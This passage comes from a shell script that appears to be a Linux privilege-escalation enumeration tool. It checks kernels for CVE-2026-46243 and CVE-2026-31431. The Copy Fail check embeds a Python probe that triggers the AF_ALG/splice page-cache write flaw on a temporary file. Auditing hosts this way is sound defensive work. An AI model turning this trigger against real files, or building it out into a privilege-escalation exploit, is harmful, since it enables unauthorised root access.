   1926   cs46243_kernel="$(cat "${cs46243_root}proc/sys/kernel/osrelease" 2>/dev/null)"
   1927   [ "$cs46243_kernel" ] || cs46243_kernel="$(uname -r 2>/dev/null)"
   1928   cs46243_kernel_is_fixed "$cs46243_kernel" && return
   1929   print_3title "CIFSwitch attack chain (CVE-2026-46243)" "T1068"
   1930   print_info "https://access.redhat.com/security/vulnerabilities/RHSB-2026-005"
   1931   echo "Loaded CIFS module + active cifs.spnego rule + executable request-key/cifs.upcall helpers" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   1932   echo "Kernel $cs46243_kernel does not expose the upstream cifs.spnego validation marker; vendor backports should be verified" | sed -${E} "s,.*,${SED_LIGHT_CYAN},"
   1933   echo "Rule: $cs46243_config -> $cs46243_helper"
   1934 }
   1935 
   1936 print_list(){
   1937   printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═"
   1938 }
   1939 
   1940 cf31_num() {
   1941     printf '%s\n' "$1" | sed 's/[^0-9].*$//; s/^0*//; s/^$/0/'
   1942 }
   1943 cf31_is_fixed_upstream_release() {
   1944     if [ "$CF31_MAJ" -ge 7 ]; then
   1945         return 0
   1946     fi
   1947     if [ "$CF31_MAJ" -eq 6 ]; then
   1948         case "$CF31_MIN" in
   1949             19) [ "$CF31_PAT" -ge 12 ] && return 0 ;;
   1950             18) [ "$CF31_PAT" -ge 22 ] && return 0 ;;
   1951             12) [ "$CF31_PAT" -ge 85 ] && return 0 ;;
   1952             6) [ "$CF31_PAT" -ge 137 ] && return 0 ;;
   1953             1) [ "$CF31_PAT" -ge 170 ] && return 0 ;;
   1954         esac
   1955     elif [ "$CF31_MAJ" -eq 5 ]; then
   1956         case "$CF31_MIN" in
   1957             15) [ "$CF31_PAT" -ge 204 ] && return 0 ;;
   1958             10) [ "$CF31_PAT" -ge 254 ] && return 0 ;;
   1959         esac
   1960     fi
   1961     return 1
   1962 }
   1963 cf31_py_can_run_probe() {
   1964     CF31_PY="$1"
   1965     if command -v timeout >/dev/null 2>&1; then
   1966         timeout "$CF31_PY_TIMEOUT" "$CF31_PY" -c 'import ctypes, os, sys
   1967 try:
   1968     if hasattr(os, "splice"):
   1969         sys.exit(0)
   1970     libc = ctypes.CDLL(None, use_errno=True)
   1971     sys.exit(0 if hasattr(libc, "splice") else 1)
   1972 except Exception:
   1973     sys.exit(1)
   1974 ' >/dev/null 2>&1
   1975     else
   1976         "$CF31_PY" -c 'import ctypes, os, sys
   1977 try:
   1978     if hasattr(os, "splice"):
   1979         sys.exit(0)
   1980     libc = ctypes.CDLL(None, use_errno=True)
   1981     sys.exit(0 if hasattr(libc, "splice") else 1)
   1982 except Exception:
   1983     sys.exit(1)
   1984 ' >/dev/null 2>&1
   1985     fi
   1986 }
   1987 cf31_run_python_probe() {
   1988     CF31_PY="$1"
   1989     CF31_TMP_PY=/tmp/cf31-probe-$$.py
   1990     trap 'rm -f "$CF31_TMP_PY"' EXIT HUP INT TERM
   1991     cat > "$CF31_TMP_PY" <<'PY'
   1992 import errno, os, signal, socket, struct, sys, tempfile, shutil
   1993 try:
   1994     signal.signal(signal.SIGALRM, lambda *_: (_ for _ in ()).throw(TimeoutError("probe timeout")))
   1995     signal.alarm(10)
   1996 except Exception:
   1997     pass
   1998 AF_ALG=38
   1999 SOCK_SEQPACKET=5
   2000 SOL_ALG=279
   2001 ALG_SET_KEY=1
   2002 ALG_SET_IV=2
   2003 ALG_SET_OP=3
   2004 ALG_SET_AEAD_ASSOCLEN=4
   2005 ALG_SET_AEAD_AUTHSIZE=5
   2006 ALG_OP_DECRYPT=0
   2007 ALG="authencesn(hmac(sha256),cbc(aes))"
   2008 PAGE=4096
   2009 TARGET_OFF=16
   2010 MARK=b"CF31"
   2011 def out(msg, code):
   2012     print(msg, flush=True)
   2013     raise SystemExit(code)
   2014 def build_splice():
   2015     if hasattr(os, "splice"):
   2016         def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None):
   2017             return os.splice(fd_in, fd_out, length, offset_src=offset_src, offset_dst=offset_dst)
   2018         return _splice
   2019     try:
   2020         import ctypes
   2021         libc=ctypes.CDLL(None, use_errno=True)
   2022         splice_fn=libc.splice
   2023         off_t=ctypes.c_longlong
   2024         splice_fn.argtypes=[ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_size_t, ctypes.c_uint]
   2025         splice_fn.restype=ctypes.c_ssize_t
   2026     except Exception as e:
   2027         out("PYTHON_UNUSABLE: splice helper is not available (%s)" % e, 1)
   2028     def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None):
   2029         in_off=off_t(offset_src) if offset_src is not None else None
   2030         out_off=off_t(offset_dst) if offset_dst is not None else None
   2031         n=splice_fn(
   2032             fd_in,
   2033             ctypes.byref(in_off) if in_off is not None else None,
   2034             fd_out,
   2035             ctypes.byref(out_off) if out_off is not None else None,
   2036             length,
   2037             0,
   2038         )
   2039         if n < 0:
   2040             err=ctypes.get_errno()
   2041             raise OSError(err, os.strerror(err))
   2042         return n
   2043     return _splice
   2044 SPLICE=build_splice()
   2045 fd=rfd=wfd=None
   2046 op=master=None
   2047 td=None
   2048 try:
   2049     try:
   2050         master=socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
   2051         master.bind(("aead", ALG))
   2052     except OSError as e:
   2053         out("NOT VULNERABLE: AF_ALG/authencesn is not reachable from this context (%s)" % (e.strerror or e), 0)
   2054     master.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "00"*32))
   2055     master.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
   2056     op,_=master.accept()
   2057     try:
   2058         op.settimeout(3.0)
   2059     except Exception:
   2060         pass
   2061     td=tempfile.mkdtemp(prefix="cf31-check-")
   2062     path=os.path.join(td, "sentinel")
   2063     baseline=b"A"*PAGE
   2064     with open(path, "wb") as f:
   2065         f.write(baseline)
   2066     fd=os.open(path, os.O_RDONLY)
   2067     os.read(fd, PAGE)
   2068     os.lseek(fd, 0, 0)
   2069     cmsgs=[
   2070         (SOL_ALG, ALG_SET_OP, struct.pack("I", ALG_OP_DECRYPT)),
   2071         (SOL_ALG, ALG_SET_IV, struct.pack("I",16)+b"\x00"*16),
   2072         (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I",8)),
   2073     ]
   2074     op.sendmsg([b"AAAA"+MARK], cmsgs, socket.MSG_MORE)
   2075     rfd,wfd=os.pipe()
   2076     splice_len=TARGET_OFF+len(MARK)
   2077     n=SPLICE(fd, wfd, splice_len, offset_src=0)
   2078     if n != splice_len:
   2079         out("UNKNOWN: short splice file->pipe (%d/%d)" % (n, splice_len), 1)
   2080     n2=SPLICE(rfd, op.fileno(), splice_len)
   2081     if n2 != splice_len:
   2082         out("UNKNOWN: short splice pipe->AF_ALG (%d/%d)" % (n2, splice_len), 1)
   2083     try:
   2084         op.recv(64)
   2085     except OSError as e:
   2086         if e.errno not in (errno.EBADMSG, errno.EINVAL):
   2087             raise
   2088     except TimeoutError:
   2089         out("PYTHON_PROBE_UNKNOWN: recv timed out", 1)
   2090     os.lseek(fd, 0, 0)
   2091     after=os.read(fd, PAGE)
   2092     if after[TARGET_OFF:TARGET_OFF+len(MARK)] == MARK:
   2093         out("VULNERABLE: non-destructive AF_ALG/splice page-cache write triggered", 2)
   2094     if after != baseline:
   2095         out("VULNERABLE: temp-file page cache changed unexpectedly", 2)
   2096     out("NOT VULNERABLE: Python runtime probe left temp-file page cache intact", 0)
   2097 except SystemExit:
   2098     raise
   2099 except Exception as e:
   2100     out("PYTHON_PROBE_UNKNOWN: %s: %s" % (type(e).__name__, e), 1)
   2101 finally:
   2102     try:
   2103         signal.alarm(0)
   2104     except Exception:
   2105         pass
   2106     for x in (fd,rfd,wfd):
   2107         try:
   2108             if x is not None:
   2109                 os.close(x)
   2110         except Exception:
   2111             pass
   2112     for s in (op,master):
   2113         try:
   2114             if s is not None:
   2115                 s.close()
   2116         except Exception:
   2117             pass
   2118     try:
   2119         if td:
   2120             shutil.rmtree(td)
   2121     except Exception:
   2122         pass
   2123 PY
   2124     if [ ! -s "$CF31_TMP_PY" ]; then
   2125         rm -f "$CF31_TMP_PY"
   2126         return 1
   2127     fi
   2128     if command -v timeout >/dev/null 2>&1; then
   2129         timeout "$CF31_PY_TIMEOUT" "$CF31_PY" "$CF31_TMP_PY"
   2130     else
   2131         "$CF31_PY" "$CF31_TMP_PY"
   2132     fi
   2133     CF31_RC=$?
   2134     rm -f "$CF31_TMP_PY"
   2135     return "$CF31_RC"
   2136 }
   2137 checkCopyFail() {
   2138     (
   2139         CF31_PY_TIMEOUT=12
   2140         CF31_TMP_PY=""
   2141         trap '[ -n "$CF31_TMP_PY" ] && rm -f "$CF31_TMP_PY"' EXIT HUP INT TERM
   2142         CF31_KERNEL_OS=$(uname -s 2>/dev/null || echo unknown)
   2143         if [ "$CF31_KERNEL_OS" != "Linux" ]; then
   2144             echo "NOT APPLICABLE: Copy Fail (CVE-2026-31431) affects Linux kernels only." | sed -${E} "s,.*,${SED_GREEN},"
   2145             exit 0
   2146         fi
   2147         for CF31_CANDIDATE in python3 python; do
   2148             if command -v "$CF31_CANDIDATE" >/dev/null 2>&1 && cf31_py_can_run_probe "$CF31_CANDIDATE"; then
   2149                 CF31_MSG=$(cf31_run_python_probe "$CF31_CANDIDATE")
   2150                 CF31_RC=$?
   2151                 case "$CF31_RC" in
   2152                     0)
   2153                         printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_GREEN},"
   2154                         exit 0
   2155                         ;;
   2156                     2)
   2157                         printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2158                         exit 2
   2159                         ;;
   2160                     1)
   2161                         [ -n "$CF31_MSG" ] && printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2162                         ;;
   2163                 esac
   2164                 echo "Python probe inconclusive; falling back to POSIX sh triage."
   2165                 break
   2166             fi
   2167         done
   2168         CF31_KERNEL_RELEASE=$(uname -r 2>/dev/null || echo unknown)
   2169         CF31_KV=$(printf '%s\n' "$CF31_KERNEL_RELEASE" | sed 's/^[^0-9]*//; s/[^0-9.].*$//')
   2170         CF31_KERNEL_VERSION="$CF31_KV"
   2171         set -- $(printf '%s\n' "$CF31_KV" | tr '.' ' ')
   2172         CF31_MAJ=$(cf31_num "${1:-0}")
   2173         CF31_MIN=$(cf31_num "${2:-0}")
   2174         CF31_PAT=$(cf31_num "${3:-0}")
   2175         CF31_API=unknown
   2176         CF31_CFG=''
   2177         for CF31_CFG_FILE in /proc/config.gz /boot/config-"$CF31_KERNEL_RELEASE" /lib/modules/"$CF31_KERNEL_RELEASE"/config; do
   2178             [ -r "$CF31_CFG_FILE" ] || continue
   2179             case "$CF31_CFG_FILE" in
   2180                 *.gz)
   2181                     if command -v gzip >/dev/null 2>&1; then
   2182                         CF31_CFG_LINE=$(gzip -cd "$CF31_CFG_FILE" 2>/dev/null | grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' | tail -n 1)
   2183                     else
   2184                         CF31_CFG_LINE=''
   2185                     fi
   2186                     ;;
   2187                 *)
   2188                     CF31_CFG_LINE=$(grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' "$CF31_CFG_FILE" 2>/dev/null | tail -n 1)
   2189                     ;;
   2190             esac
   2191             [ -n "$CF31_CFG_LINE" ] && CF31_CFG=$CF31_CFG_LINE
   2192         done
   2193         case "$CF31_CFG" in
   2194             *'is not set'*) CF31_API=off ;;
   2195             *=y) CF31_API=builtin ;;
   2196             *=m) CF31_API=module ;;
   2197         esac
   2198         if [ "$CF31_API" = unknown ]; then
   2199             if [ -e /sys/module/algif_aead ]; then
   2200                 CF31_API=loaded
   2201             elif command -v modinfo >/dev/null 2>&1 && modinfo algif_aead >/dev/null 2>&1; then
   2202                 CF31_API=module
   2203             elif find /lib/modules/"$CF31_KERNEL_RELEASE" -name 'algif_aead.ko*' -print 2>/dev/null | grep -q .; then
   2204                 CF31_API=module
   2205             elif [ -r /proc/crypto ] && grep -q 'authencesn(hmac(sha256),cbc(aes))' /proc/crypto 2>/dev/null; then
   2206                 CF31_API=reachable
   2207             fi
   2208         fi
   2209         if [ "$CF31_API" = off ]; then
   2210             echo "NOT VULNERABLE: CONFIG_CRYPTO_USER_API_AEAD is disabled." | sed -${E} "s,.*,${SED_GREEN},"
   2211             exit 0
   2212         fi
   2213         CF31_BLOCKED=no
   2214         for CF31_CFG_FILE in /etc/modprobe.d/*.conf /lib/modprobe.d/*.conf /usr/lib/modprobe.d/*.conf; do
   2215             [ -f "$CF31_CFG_FILE" ] || continue
   2216             if grep -Eq '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+(/usr)?/bin/(false|true)([[:space:]]|$)' "$CF31_CFG_FILE" 2>/dev/null; then
   2217                 CF31_BLOCKED=yes
   2218             fi
   2219         done
   2220         if [ "$CF31_API" = module ] && [ "$CF31_BLOCKED" = yes ] && [ ! -e /sys/module/algif_aead ]; then
   2221             echo "NOT VULNERABLE: algif_aead autoload is blocked and the module is not loaded." | sed -${E} "s,.*,${SED_GREEN},"
   2222             exit 0
   2223         fi
   2224         if [ -r /proc/cmdline ] && grep -q 'initcall_blacklist=algif_aead_init' /proc/cmdline 2>/dev/null; then
   2225             echo "LIKELY NOT VULNERABLE: kernel booted with initcall_blacklist=algif_aead_init." | sed -${E} "s,.*,${SED_GREEN},"
   2226             exit 0
   2227         fi
   2228         CF31_FIXED_PKG=no
   2229         if command -v dpkg-query >/dev/null 2>&1; then
   2230             CF31_PKG=$(dpkg-query -S "/boot/vmlinuz-$CF31_KERNEL_RELEASE" 2>/dev/null | sed 's/:.*//' | sed -n '1p')
   2231             if [ -n "$CF31_PKG" ]; then
   2232                 for CF31_CFG_FILE in /usr/share/doc/"$CF31_PKG"/changelog*; do
   2233                     [ -f "$CF31_CFG_FILE" ] || continue
   2234                     case "$CF31_CFG_FILE" in
   2235                         *.gz) command -v gzip >/dev/null 2>&1 && gzip -cd "$CF31_CFG_FILE" 2>/dev/null ;;
   2236                         *) cat "$CF31_CFG_FILE" 2>/dev/null ;;
   2237                     esac
   2238                 done | grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes
   2239             fi
   2240         fi
   2241         if [ "$CF31_FIXED_PKG" = no ] && command -v rpm >/dev/null 2>&1; then
   2242             CF31_PKG=$(rpm -q --whatprovides "kernel-uname-r = $CF31_KERNEL_RELEASE" 2>/dev/null | sed -n '1p')
   2243             case "$CF31_PKG" in
   2244                 ''|no\ package*) ;;
   2245                 *)
   2246                     rpm -q --changelog "$CF31_PKG" 2>/dev/null |
   2247                         grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes
   2248                     ;;
   2249             esac
   2250         fi
   2251         if [ "$CF31_FIXED_PKG" = yes ]; then
   2252             echo "LIKELY NOT VULNERABLE: running kernel package changelog mentions the CVE-2026-31431 fix." | sed -${E} "s,.*,${SED_GREEN},"
   2253             exit 0
   2254         fi
   2255         if [ "$CF31_MAJ" -lt 4 ] || { [ "$CF31_MAJ" -eq 4 ] && [ "$CF31_MIN" -lt 14 ]; }; then
   2256             echo "NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE predates the vulnerable upstream commit." | sed -${E} "s,.*,${SED_GREEN},"
   2257             exit 0
   2258         fi
   2259         if cf31_is_fixed_upstream_release; then
   2260             echo "LIKELY NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE is at/after a fixed upstream release." | sed -${E} "s,.*,${SED_GREEN},"
   2261             exit 0
   2262         fi
   2263         if [ "$CF31_API" = unknown ]; then
   2264             echo "UNKNOWN: $CF31_KERNEL_RELEASE is in the affected upstream range, but AEAD user API exposure could not be verified." | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2265             exit 1
   2266         fi
   2267         echo "LIKELY VULNERABLE: $CF31_KERNEL_RELEASE is in the affected upstream range and AEAD user API appears $CF31_API." | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2268         exit 2
   2269     )
   2270 }
   2271 
   2272 echo_not_found(){
   2273   printf $DG"$1 Not Found\n"$NC
   2274 }
   2275 
   2276 KERNEL_CVE_EXPL=""
   2277 KERNEL_CVE_ALT=""
   2278 KERNEL_CVE_MIL=""
   2279 kercve_norm_ver() {
   2280     printf "%s" "$1" | tr '-' '.' | sed 's/[^0-9.].*$//' | sed 's/\.\./\./g' | sed 's/^\.//' | sed 's/\.$//'
   2281 }
   2282 kercve_ver_cmp() {
   2283     KERNEL_CVE_CURVER=$(kercve_norm_ver "$1")
   2284     KERNEL_CVE_REQVER=$(kercve_norm_ver "$3")
   2285     KERNEL_CVE_OP="$2"
   2286     [ -z "$KERNEL_CVE_CURVER" ] && return 1
   2287     [ -z "$KERNEL_CVE_REQVER" ] && return 1
   2288     KERNEL_CVE_CMP=$(awk -v a="$KERNEL_CVE_CURVER" -v b="$KERNEL_CVE_REQVER" '
   2289     function clean(v){gsub(/[^0-9]/,"",v); if(v=="")v=0; return v+0}
   2290     BEGIN{
   2291       na=split(a,A,"."); nb=split(b,B,"."); n=(na>nb?na:nb);
   2292       for(i=1;i<=n;i++){
   2293         va=(i<=na?clean(A[i]):0); vb=(i<=nb?clean(B[i]):0);
   2294         if(va<vb){print -1; exit}
   2295         if(va>vb){print 1; exit}
   2296       }
   2297       print 0
   2298     }')
   2299     case "$KERNEL_CVE_OP" in
   2300         '=') [ "$KERNEL_CVE_CMP" -eq 0 ] ;;
   2301         '>') [ "$KERNEL_CVE_CMP" -gt 0 ] ;;
   2302         '<') [ "$KERNEL_CVE_CMP" -lt 0 ] ;;
   2303         '>=') [ "$KERNEL_CVE_CMP" -ge 0 ] ;;
   2304         '<=') [ "$KERNEL_CVE_CMP" -le 0 ] ;;
   2305         *) return 1 ;;
   2306     esac
   2307 }
   2308 kercve_get_cfg_line() {
   2309     KERNEL_CVE_CFG_KEY="$1"
   2310     if [ -z "$KERNEL_CVE_CFG_SOURCE" ] || ! [ -r "$KERNEL_CVE_CFG_SOURCE" ]; then
   2311         return 1
   2312     fi
   2313     if printf "%s" "$KERNEL_CVE_CFG_SOURCE" | grep -q '\\.gz$'; then
   2314         KERNEL_CVE_CFG_LINE=$(gzip -dc "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" | head -n1)
   2315     else
   2316         KERNEL_CVE_CFG_LINE=$(grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | head -n1)
   2317     fi
   2318     [ -n "$KERNEL_CVE_CFG_LINE" ]
   2319 }
   2320 kercve_eval_config_req() {
   2321     KERNEL_CVE_CFG_EXPR="$1"
   2322     [ -z "$KERNEL_CVE_CFG_SOURCE" ] && return 0
   2323     if printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '!='; then
   2324         KERNEL_CVE_CFG_OP='!='
   2325         KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $1}')
   2326         KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $2}')
   2327     elif printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '='; then
   2328         KERNEL_CVE_CFG_OP='='
   2329         KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $1}')
   2330         KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $2}')
   2331     else
   2332         KERNEL_CVE_CFG_OP='present'
   2333         KERNEL_CVE_CFG_KEY="$KERNEL_CVE_CFG_EXPR"
   2334         KERNEL_CVE_CFG_EXPECT='[my]'
   2335     fi
   2336     if ! kercve_get_cfg_line "$KERNEL_CVE_CFG_KEY"; then
   2337         return 0
   2338     fi
   2339     if printf "%s" "$KERNEL_CVE_CFG_LINE" | grep -q '# .* is not set'; then
   2340         KERNEL_CVE_CFG_CUR='n'
   2341     else
   2342         KERNEL_CVE_CFG_CUR=$(printf "%s" "$KERNEL_CVE_CFG_LINE" | awk -F'=' '{print $2}')
   2343     fi
   2344     if [ "$KERNEL_CVE_CFG_OP" = '!=' ]; then
   2345         if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then
   2346             ! printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$'
   2347         else
   2348             [ "$KERNEL_CVE_CFG_CUR" != "$KERNEL_CVE_CFG_EXPECT" ]
   2349         fi
   2350         return
   2351     fi
   2352     if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then
   2353         printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$'
   2354         return
   2355     fi
   2356     [ "$KERNEL_CVE_CFG_CUR" = "$KERNEL_CVE_CFG_EXPECT" ]
   2357 }
   2358 kercve_eval_sysctl_req() {
   2359     KERNEL_CVE_SYS_EXPR="$1"
   2360     if printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '!='; then
   2361         KERNEL_CVE_SYS_OP='!='
   2362         KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $1}')
   2363         KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $2}')
   2364     elif printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '=='; then
   2365         KERNEL_CVE_SYS_OP='=='
   2366         KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $1}')
   2367         KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $2}')
   2368     else
   2369         return 1
   2370     fi
   2371     KERNEL_CVE_SYS_CUR=$(sysctl -n "$KERNEL_CVE_SYS_KEY" 2>/dev/null)
   2372     [ -z "$KERNEL_CVE_SYS_CUR" ] && return 0
   2373     if [ "$KERNEL_CVE_SYS_OP" = '==' ]; then
   2374         [ "$KERNEL_CVE_SYS_CUR" = "$KERNEL_CVE_SYS_VAL" ]
   2375     else
   2376         [ "$KERNEL_CVE_SYS_CUR" != "$KERNEL_CVE_SYS_VAL" ]
   2377     fi
   2378 }
   2379 kercve_eval_req_token() {
   2380     KERNEL_CVE_REQ="$1"
   2381     [ -z "$KERNEL_CVE_REQ" ] && return 0
   2382     if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^pkg='; then
   2383         [ "$KERNEL_CVE_REQ" = 'pkg=linux-kernel' ]
   2384         return
   2385     fi
   2386     if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^ver'; then
   2387         KERNEL_CVE_OP=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>).*/\1/')
   2388         KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>)//')
   2389         kercve_ver_cmp "$KERNEL_CVE_KERNEL_VERSION" "$KERNEL_CVE_OP" "$KERNEL_CVE_VER"
   2390         return
   2391     fi
   2392     if [ "$KERNEL_CVE_REQ" = 'x86_64' ]; then
   2393         [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86_64' ]
   2394         return
   2395     fi
   2396     if [ "$KERNEL_CVE_REQ" = 'x86' ]; then
   2397         [ "$KERNEL_CVE_KERNEL_ARCH" = 'i386' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'i686' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86' ]
   2398         return
   2399     fi
   2400     if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^CONFIG_'; then
   2401         kercve_eval_config_req "$KERNEL_CVE_REQ"
   2402         return
   2403     fi
   2404     if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^sysctl:'; then
   2405         kercve_eval_sysctl_req "${KERNEL_CVE_REQ#sysctl:}"
   2406         return
   2407     fi
   2408     if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^cmd:'; then
   2409         eval "${KERNEL_CVE_REQ#cmd:}" >/dev/null 2>&1
   2410         return
   2411     fi
   2412     return 1
   2413 }
   2414 kercve_match_version_list() {
   2415     KERNEL_CVE_VERS="$1"
   2416     KERNEL_CVE_VER_LINES=$(printf "%s" "$KERNEL_CVE_VERS" | tr ',' '\n')
   2417     while IFS= read -r KERNEL_CVE_VER; do
   2418         KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_VER" | sed 's/^ *//;s/ *$//')
   2419         [ -z "$KERNEL_CVE_VER" ] && continue
   2420         if printf "%s" "$KERNEL_CVE_KERNEL_VERSION" | grep -Eq "^${KERNEL_CVE_VER}(\\.|-|$)"; then
   2421             return 0
   2422         fi
   2423     done <<EOFV
   2424 $KERNEL_CVE_VER_LINES
   2425 EOFV
   2426     return 1
   2427 }
   2428 kercve_normalize_cve_list() {
   2429     KERNEL_CVE_ID_RAW="$1"
   2430     KERNEL_CVE_ID_OUT=""
   2431     KERNEL_CVE_ID_RAW=$(printf "%s" "$KERNEL_CVE_ID_RAW" | tr ';' ',' | tr '|' ',')
   2432     while IFS= read -r KERNEL_CVE_ID_ITEM; do
   2433         KERNEL_CVE_ID_ITEM=$(printf "%s" "$KERNEL_CVE_ID_ITEM" | sed 's/^ *//;s/ *$//' | tr '[:lower:]' '[:upper:]')
   2434         [ -z "$KERNEL_CVE_ID_ITEM" ] && continue
   2435         if printf "%s" "$KERNEL_CVE_ID_ITEM" | grep -Eq '^CVE-[0-9]{4}-[0-9]+$'; then
   2436             if [ -z "$KERNEL_CVE_ID_OUT" ]; then KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_ITEM"; else KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_OUT,$KERNEL_CVE_ID_ITEM"; fi
   2437             continue
   2438         fi
   2439         if printf "%s" "$KERNEL_CVE_ID_ITEM" | grep -Eq '^[0-9]{4}-[0-9]+$'; then
   2440             if [ -z "$KERNEL_CVE_ID_OUT" ]; then KERNEL_CVE_ID_OUT="CVE-$KERNEL_CVE_ID_ITEM"; else KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_OUT,CVE-$KERNEL_CVE_ID_ITEM"; fi
   2441             continue
   2442         fi
   2443     done <<EOFC
   2444 $(printf "%s" "$KERNEL_CVE_ID_RAW" | tr ',' '\n')
   2445 EOFC
   2446     printf "%s" "$KERNEL_CVE_ID_OUT"
   2447 }
   2448 kercve_print_match() {
   2449     KERNEL_CVE_PRINT_ID="$1"
   2450     KERNEL_CVE_NAME="$2"
   2451     KERNEL_CVE_REQS="$3"
   2452     KERNEL_CVE_TAGS="$4"
   2453     KERNEL_CVE_RANK="$5"
   2454     KERNEL_CVE_COMMENTS="$6"
   2455     KERNEL_CVE_PRINT_LINE=""
   2456     [ -n "$KERNEL_CVE_PRINT_ID" ] && KERNEL_CVE_PRINT_LINE="CVE: $KERNEL_CVE_PRINT_ID"
   2457     [ -n "$KERNEL_CVE_NAME" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Name: $KERNEL_CVE_NAME"
   2458     [ -n "$KERNEL_CVE_REQS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Match data: $KERNEL_CVE_REQS"
   2459     [ -n "$KERNEL_CVE_TAGS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Tags: $KERNEL_CVE_TAGS"
   2460     [ -n "$KERNEL_CVE_RANK" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Rank: $KERNEL_CVE_RANK"
   2461     [ -n "$KERNEL_CVE_COMMENTS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Details: $KERNEL_CVE_COMMENTS"
   2462     [ -z "$KERNEL_CVE_PRINT_LINE" ] && KERNEL_CVE_PRINT_LINE="Kernel vuln matched with no printable metadata"
   2463     printf "%s\n" "$KERNEL_CVE_PRINT_LINE" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2464 }
   2465 kercve_run_registry() {
   2466     KERNEL_CVE_KERNEL_OS=$(uname -s 2>/dev/null)
   2467     KERNEL_CVE_KERNEL_RELEASE=$(uname -r 2>/dev/null)
   2468     KERNEL_CVE_KERNEL_VERSION=$(kercve_norm_ver "$KERNEL_CVE_KERNEL_RELEASE")
   2469     KERNEL_CVE_KERNEL_ARCH=$(uname -m 2>/dev/null)
   2470     KERNEL_CVE_CFG_SOURCE=""
   2471     for KERNEL_CVE_CFG_FILE in "/proc/config.gz" "/boot/config-$KERNEL_CVE_KERNEL_RELEASE" "/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/src/linux/.config"; do
